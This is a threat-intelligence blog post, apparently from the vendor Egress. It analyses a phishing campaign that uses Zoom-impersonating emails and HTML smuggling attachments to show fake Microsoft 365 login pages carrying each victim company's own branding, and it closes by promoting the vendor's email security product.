On March 15th, 2023, a new feature released from Microsoft enabled organizations with a paid subscription to Microsoft 365 for business, Microsoft Dynamics CRM Online, Enterprise Mobility Suite, or other Microsoft services, to add company branding to their Microsoft 365 sign-in page via Azure Active Directory.
This update is often recommended to improve both user experience and security by providing assurance the individual is logging in via the legitimate page for their company.
However, in July 2023, Egress Threat Intelligence analysts uncovered evidence that malicious actors are now using this customization in credential harvesting phishing attacks to improve credibility and increase the likelihood that the target will fall victim.
Quick attack summary
- Vector and Type: Email phishing, HTML attachments hyperlinked to phishing website
- Techniques: Brand impersonation, account compromise, credential harvesting
- Payloads: Attachment
- Targets: USA and UK
- Platform: Microsoft 365
- Bypassed SEG: Yes
How the credential harvesting attack plays out
What the Zoom impersonation phishing emails look like
The attack starts with a phishing email containing an HTML attachment. The example analyzed below was sent to an Egress employee. The attack impersonates videoconferencing provider Zoom, informing the target they have a voicemail.
While the email uses a stylized HTML template, with a well-rendered Zoom logo and company footer, it was sent from a compromised third-party account, hidden beneath the display name ‘no reply webmaster’.
The Egress Defend banners displayed in the image below show that the recipient has received communication from this email address before, as there is no banner labelling the email as from a ‘First Time Sender’. Further investigation revealed this earlier communication was another phishing email, so our analysts classified this as an account compromise attack within a third party, rather than a supply chain compromise attack (which requires a business relationship).
The email instructs the recipient to open the HTML attachment to listen to the message if they cannot access it via the hyperlink in the body copy. In reality, the hyperlink is a dummy and the only action the recipient can take is to open the attachment.
Screenshot showing Zoom impersonation email containing dummy hyperlink and malicious HTML attachment
Mailbox rendering of Zoom impersonation attack containing malicious HTML attachment and displaying Egress Defend anti-phishing banners
What the HTML payload looks like
As part of their investigation, our Threat Intelligence team examined the code within the HTML attachment, analyzing the redirect that is activated when the recipient opens it.
They discovered Egress’ legitimate company logo hosted on a malicious phishing website. To even the trained eye, this looks like the real log-in page.
Screenshot showing URL for the malicious phishing website (partially blurred for security purposes) that displays a spoofed Microsoft 365 log in page with legitimate Egress branding
The malicious JavaScript within the HTML attachment is coded to perform two actions. When the victim opens the attachment, the credential harvesting webpage is loaded at a slightly delayed speed. Simultaneously, the code automatically preloads the victims’ email address into the fake log-in panel, leaving only their password to be inputted, and uses an HTTP Get Request to copy the company’s branding onto the phishing webpage. All of this is completed in a matter of seconds.
Diagram of attack flow
On further investigation, the team saw the attack mirrored across other companies, with each payload redirecting the target to a similar credential harvesting website that used the organizations’ logos to as a spoofed customized log in page.
Egress analysis: Using trust signals to socially engineer targets and HTML smuggling attacks
Manipulating trust for phishing success
This phishing campaign demonstrates two instances of subverting the target’s trust through social engineering. The cybercriminal uses a stylized HTML email template for their phishing email, impersonating the household brand Zoom.
In doing so, the cybercriminal hopes to use the ‘halo effect’ cognitive bias, leveraging the recipient’s trust in the brand to prompt them to open the attachment. Additionally, familiarity can often breed complacency, with people more likely to interact with brands they recognize or typically interact with.
Next, the cybercriminal uses the target’s employer brand to socially engineer them. Custom branding on log-in pages is often used to provide assurance that the end use is logging into the correct system and not falling victim to a cyberattack. The credential harvesting website renders the log-in page perfectly, making it harder for the target to spot. Preloading the victim’s email address into the fake log-in panel mimics the typical process an end-user experiences, while also making it easier for them by only requiring the password.
In addition, an organization’s own trust in Microsoft can also be subverted, as Microsoft 365 log-in pages can also be used to ‘map’ an organization to test which mailboxes on the domain are active. This tactic has been used for some time already, but chatter on darkweb forums, such as Dread, has recently surfaced to re-promote it.
HTML smuggling attacks
In an HTML smuggling attack, cybercriminals use HTML5 and JavaScript to create a highly evasive payload. Malicious scripts are coded within the attachment, ultimately enabling the cybercriminal to build malware behind an organization’s firewall or, as shown above, direct a user to interact with a phishing website.
The payloads are referred to as ‘smuggling attacks’, as they cannot be detected by traditional perimeter controls such as web proxies or email gateways, which look for malicious attachments or traffic based on signatures and patterns. Essentially, the payload is obfuscated behind seemingly benign HTML or JavaScript.
As a result, instances of HTML smuggling attacks have increased in the last year, with cybercriminals ‘leaning in’ on a successful tactic.
Detecting and preventing advanced phishing attacks
This attack demonstrates the importance of detecting and neutralizing phishing attacks before a recipient opens an attachment or clicks on a link. The perfectly rendered log-in page is difficult to spot as a credential harvesting site even to a highly trained eye, let alone a busy end-user who has only received periodic security training. Except for the URL, the page is identical to the legitimate log in page.
This attack has been specifically designed to bypass traditional perimeter controls using advanced tactics and demonstrates the need for organizations use an integrated cloud email security solution, like Egress Defend, that can detect social engineering within the content of the email body and obfuscated payloads, such as HTML smuggling attacks.